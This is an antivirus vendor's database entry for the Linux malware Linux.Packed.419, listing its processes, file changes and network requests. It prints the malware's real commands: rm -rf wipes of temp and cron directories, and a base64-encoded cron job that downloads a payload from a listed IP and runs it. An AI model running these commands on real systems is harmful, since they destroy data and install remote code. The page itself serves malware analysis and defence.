Per il corretto funzionamento del sito, è necessario attivare il supporto di JavaScript nel browser.
Linux.Packed.419
Aggiunto al database dei virus Dr.Web:
2019-05-23
La descrizione è stata aggiunta:
2019-05-23
Technical Information
Malicious functions:
Launches itself as a daemon
Substitutes application name for:
ybxp
liueto
lycq
* **
ufw
Launches processes:
sh -c crontab -r ; rm -rf /tmp/* ; rm -rf /tmp/.* ; rm -rf /dev/shm/* ; rm -rf /dev/shm/.* ; rm -rf /var/spool/cron/*/* ; rm -rf /var/spool/ana*/*/*
crontab -r
rm -rf /tmp/*
rm -rf /tmp/. /tmp/.. /tmp/.ICE-unix /tmp/.Test-unix /tmp/.X11-unix /tmp/.XIM-unix /tmp/.font-unix
rm -rf /dev/shm/*
rm -rf /dev/shm/. /dev/shm/..
rm -rf /var/spool/cron/*/*
rm -rf /var/spool/ana*/*/*
sh -c /root/hclrjy
/root/hclrjy
sh -c /root/lumktt lycq
/root/lumktt lycq
sh -c /root/tmxuel ojtr
/root/tmxuel ojtr
sh -c /root/dtdm
/root/dtdm
sh -c /root/qoruelgcdi snhv
sh -c /root/flxlusnnud lyxc
sh -c /root/vmpshocrts xufe
sh -c /root/sjuspepcbg vtvp
sh -c /root/vesxdextqg msdk
sh -c /root/vigmdldwjh bxtq
sh -c /root/xcpgjilhdx tomb
sh -c /root/twkrjhbfbe sxdj
sh -c /root/cuymljvjoo sgcu
sh -c /root/urmdtbming euqy
/root/twkrjhbfbe sxdj
/root/xcpgjilhdx tomb
sh -c /root/gwsfio ddhn
sh -c /root/cnxidmkoxd icsj
sh -c echo '* * * * * echo -n \"KCBjaG1vZCA3NzcgL3Vzci9iaW4vcHkqIDsgcHl0aG9uIC1jICdpbXBvcnQgb3Msc3lzLHVybGxpYixvcy5wYXRoO25tPW9zLnVyYW5kb20oNCkuZW5jb2RlKCJoZXgiKTsgaG09b3MucGF0aC5leHBhbmR1c2VyKCJ+LyIpOyBwYXRocyA9W2htLCIvdG1wLyIsIi92YXIvdG1wLyIsIi9kZXYvc2htLyJdOyBsX3B0aD1uZXh0KGl0ZXIocHRoIGZvciBwdGggaW4gcGF0aHMgaWYgb3MuYWNjZXNzKHB0aCwgb3MuRl9PS3xvcy5SX09LfG9zLldfT0t8b3MuWF9PSyApIG9yIFtdKSwgTm9uZSk7aD1sX3B0aCtubTsgaGQgPSB1cmxsaWIudXJscmV0cmlldmUgKCJodHRwOi8vMzcuMjI4LjEyOS41OC9ob21lL3N5bmMiLCBoKTsgZi5jbG9zZSgpO29zLnN5c3RlbSgiY2htb2QgNzc3NyB7fSIuZm9ybWF0KGgpKTtvcy5zeXN0ZW0oImNobW9kICt4IHt9Ii5mb3JtYXQoaCkpOyBvcy5zeXN0ZW0oInt9Ii5mb3JtYXQoaCkpJyAgKQ==\" | base64 -d | sh > /dev/null' | crontab -;
/root/gwsfio ddhn
/root/cnxidmkoxd icsj
crontab -
Kills system processes:
Kills the following processes:
run.sh
bash
atd
(sd-pam)
/bin/sh
/root/lumktt
/root/dtdm
Unknown process with PID: 0
cron
systemd-journal
Performs operations with the file system:
Modifies file access rights:
/root/hclrjy
/root/lumktt
/root/tmxuel
/root/dtdm
/dev/urandom
/root/qoruelgcdi
/root/vmpshocrts
/root/flxlusnnud
/root/sjuspepcbg
/root/vesxdextqg
/usr/bin/perl
/usr/bin/python3.4
/root/vigmdldwjh
/usr/bin/python2.7
/usr/bin/mawk
/usr/bin/xargs
/root/xcpgjilhdx
/bin/sed
/usr/bin/crontab
/root/cuymljvjoo
/root/urmdtbming
/root/gwsfio
/root/cnxidmkoxd
Creates or modifies files:
/root/hclrjy
/root/lumktt
/root/c
/root/dtdm
/root/tmxuel
/root/flxlusnnud
/root/qoruelgcdi
/root/vmpshocrts
/root/vesxdextqg
/root/sjuspepcbg
/root/vigmdldwjh
/root/xcpgjilhdx
/root/twkrjhbfbe
/root/cuymljvjoo
/root/urmdtbming
/root/gwsfio
/root/cnxidmkoxd
Deletes files:
/tmp/*
/dev/shm/*
/var/spool/cron/*/*
/var/spool/ana*/*/*
/root/lumktt
/root/dtdm
/root/tmxuel
/root/ojtr
/root/qoruelgcdi
/root/vmpshocrts
/root/vesxdextqg
/root/vigmdldwjh
/root/xcpgjilhdx
/root/twkrjhbfbe
/root/cuymljvjoo
/root/urmdtbming
/root/gwsfio
/root/cnxidmkoxd
Network activity:
HTTP GET requests:
37.###.129.58/home/sync
95.###.142.161/c/cdc
95.###.142.161/c/coooc
95.###.142.161/c/nap
37.###.129.58/home/slpr
95.###.142.161/c/dth
Receives data from the following servers:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Scaricate Dr.Web per Android
Gratis per 3 mesi
Tutti i componenti di protezione
Rinnovo versione di prova tramite AppGallery/Google Pay
Continuando a utilizzare questo sito, l'utente acconsente al nostro utilizzo di file Cookie e di altre tecnologie per la raccolta di informazioni statistiche sui visitatori. Per maggiori informazioni
OK